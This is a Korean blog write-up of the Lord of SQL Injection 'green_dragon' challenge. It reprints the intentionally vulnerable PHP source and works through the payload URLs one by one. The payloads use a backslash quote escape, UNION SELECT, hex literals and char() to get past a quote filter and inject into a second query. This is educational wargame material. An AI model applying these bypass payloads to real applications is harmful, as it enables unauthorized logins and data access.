Oh! JUN
[Lord Of SQL Injection] N 25번(평문 → ASCII → hex) 본문
[Lord Of SQL Injection] N 25번(평문 → ASCII → hex)
Kwon Oh! JUN 2022. 2. 18. 02:31query : select id,pw from prob_green_dragon where id='' and pw=''
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
연결되는 핵심 코드를 보고 설명하자면(+'(작은따음표)예외처리)
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
$query에 쿼리문이 들어가고 $result에 쿼리문에 의해 동작한 값이 테이블에 들어간다.
$query2를 보면 $result[id], $result[pw]이 있는걸 보면 $query의 쿼리문에 의해 $query2에도 영향을 끼치는걸 확인할 수 있다. ($result[id], $result[pw] 둘다 들어가야 쿼리가 정상적으로 작동하니까 둘다 필요함)
$query2의 쿼리문에 의해 동작한 값이 $result에 다시 들어가게 되는데 여기서 'id'에 "admin"이 들어있으면 문제가 해결된다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%201,2%23
query : select id,pw from prob_green_dragon where id='\' and pw='union select 1,2#'
query2 : select id from prob_green_dragon where id='1' and pw='2'
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
select id,pw from prob_green_dragon where id='\' and pw='union select 1,2#'
\'는 싱글쿼터 이스케이프로 '\' and pw='는 문자열 처리된다.
그래서 id='\' and pw=' 에서 id는 알수 없는 값 false가 되서 아무것도 select 할수 없고, union select 1,2 id와 pw에 순서대로 1,2가 들어가게 된다.
그래서 결국 query2도 확인을 할 수가 있다.
query2에서도 'admin'을 넣어줄려면 query1에서 해준것처럼 똑같이 해주면 된다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%20\,%202%23
query : select id,pw from prob_green_dragon where id='\' and pw='union select \, 2#'
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
해보면 알겠지만, 1을 \로 바꿔주면 query2는 작동을 안하는걸 확인할 수 있다.
그래서 hex값으로 변경을 해보았다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%200x5c,%202%23
query : select id,pw from prob_green_dragon where id='\' and pw='union select 0x5c, 2#'
query2 : select id from prob_green_dragon where id='\' and pw='2'
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
\를 0x5c hex값으로 변경해서 해보니까 정상적으로 query2가 작동하는걸 확인할 수 있다.
\는 해결완료!
이제 뒤에 쿼리를 확인해보겠다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%200x5c,%20union%20select%20%27admin%27%23
select id,pw from prob_green_dragon where id='\' and pw='union select 0x5c, union select 'admin'#'
위와 같은 쿼리를 줘야하지만 '때문에 예외처리된다.
그래서 'admin'를 아스키코드(char(97,100,109,105,110))로 만들어서 문자열 함수로 씌워줬다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%200x5c,%20union%20select%20char(97,100,109,105,110)%23
query : select id,pw from prob_green_dragon where id='\' and pw='union select 0x5c, union select char(97,100,109,105,110)#'
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
query2가 정상적으로 작동하지 않는다.
혹시나 싶어서 union select char(97,100,109,105,110)#도 hex값으로 변경해주었다.
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=union%20select%200x5c,%200x756e696f6e2073656c65637420636861722839372c3130302c3130392c3130352c3131302923%23
query : select id,pw from prob_green_dragon where id='\' and pw='union select 0x5c, 0x756e696f6e2073656c65637420636861722839372c3130302c3130392c3130352c3131302923#'
query2 : select id from prob_green_dragon where id='\' and pw='union select char(97,100,109,105,110)#'
GREEN_DRAGON Clear!
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
$query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
$result = mysqli_fetch_array(mysqli_query($db,$query2));
if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
해결완료!!
'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글
[Lord Of SQL Injection] 27번(sleep()함수를 활용해 시간 차 출력) (0) | 2022.03.06 |
---|---|
[Lord Of SQL Injection] 26번(%0a(엔터)로 뒤에 주석 무력화, 이진탐색) (0) | 2022.02.24 |
[Lord Of SQL Injection] 24번(이전문제와 비슷하다) (0) | 2022.02.16 |
[Lord Of SQL Injection] 23번(order by 활용★★★★★) (0) | 2022.02.14 |
[Lord Of SQL Injection] 22번(error blind sql) (0) | 2022.02.13 |